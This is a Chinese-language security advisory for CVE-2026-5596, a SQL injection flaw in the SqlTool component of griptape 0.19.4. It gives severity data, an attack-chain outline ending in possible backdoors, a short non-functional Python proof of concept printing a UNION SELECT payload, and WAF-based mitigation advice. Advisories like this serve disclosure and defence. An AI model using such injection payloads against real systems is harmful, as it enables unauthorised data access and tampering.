CVE-2026-5596 griptape SqlTool SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-5596

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

griptape-ai griptape

漏洞概述

griptape-ai griptape 0.19.4版本中的SqlTool组件存在SQL注入漏洞。该漏洞源于griptape/tools/sql/tool.py文件对特定输入处理存在问题。攻击者无需用户交互，仅需低权限即可通过网络发起远程攻击。通过操纵输入数据，攻击者可执行任意SQL语句，造成数据泄露、篡改或破坏。目前该漏洞利用代码已公开，且厂商尚未对此做出修复响应。

技术细节

该漏洞具体存在于griptape-ai griptape框架的SqlTool组件中，文件路径为griptape/tools/sql/tool.py。SqlTool通常用于将自然语言转换为SQL查询并执行。在0.19.4版本中，该组件在构建SQL语句时，未对用户提供的输入参数进行严格的类型检查或转义处理，直接将其拼接到数据库查询指令中。这种不安全的编码方式导致了经典的SQL注入漏洞。攻击者可以通过构造特定的恶意Payload，利用SqlTool的接口欺骗后端数据库执行非预期的SQL命令。由于CVSS评分显示攻击复杂度低且无需用户交互，该漏洞极易被自动化工具利用。成功的攻击可能导致未经授权的数据访问、数据篡改以及服务可用性受损。鉴于厂商未响应，该风险在未打补丁的环境中持续存在。

攻击链分析

STEP 1

侦察

识别目标系统是否使用了griptape-ai griptape 0.19.4版本，并确认SqlTool组件是否启用。

STEP 2

漏洞利用

攻击者构造恶意的SQL注入Payload，通过网络向SqlTool接口发送特制的数据请求。

STEP 3

命令执行

由于后端未对输入进行过滤，恶意SQL语句被数据库执行，攻击者可读取、修改或删除数据。

STEP 4

维持权限

根据注入的内容，攻击者可能进一步获取数据库服务器的读写权限或建立后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-5596: SQL Injection in griptape SqlTool
# This script demonstrates the conceptual exploit of the vulnerability.

import requests

def exploit_sql_injection(target_url, malicious_input):
    """
    Simulates sending a malicious payload to the vulnerable SqlTool component.
    The vulnerability exists in griptape/tools/sql/tool.py where input is not sanitized.
    """
    # Example payload to extract database version or bypass authentication
    payload = "' UNION SELECT NULL, version(), NULL -- "
    
    # Construct the data payload that would be sent to the tool
    data = {
        "query": malicious_input + payload  # Simulating the injection point
    }
    
    try:
        # In a real scenario, this would be the endpoint exposing the SqlTool
        # response = requests.post(target_url, json=data)
        print(f"[*] Sending payload to {target_url}")
        print(f"[*] Payload: {payload}")
        # print(f"[+] Response: {response.text}")
        return True
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
        return False

if __name__ == "__main__":
    print("[!] CVE-2026-5596 Proof of Concept")
    exploit_sql_injection("http://target-service/api/tool", "user_input")

影响范围

griptape-ai griptape 0.19.4

防御指南

临时缓解措施

由于厂商尚未响应，建议暂时停用受影响的SqlTool组件，或者在应用网关处部署WAF规则，拦截常见的SQL注入攻击特征（如单引号、UNION SELECT、注释符等）。同时，应检查数据库日志以确认是否已被入侵。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5596
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5596
3 Details https://www.cvedetails.com/cve/CVE-2026-5596/
4 VulDB https://vuldb.com/cve/CVE-2026-5596
5 Link https://github.com/Ka7arotto/cve/blob/main/griptape/text2sqlTool/issue.md
6 Link https://vuldb.com/submit/784464
7 Link https://vuldb.com/vuln/355390
8 Link https://vuldb.com/vuln/355390/cti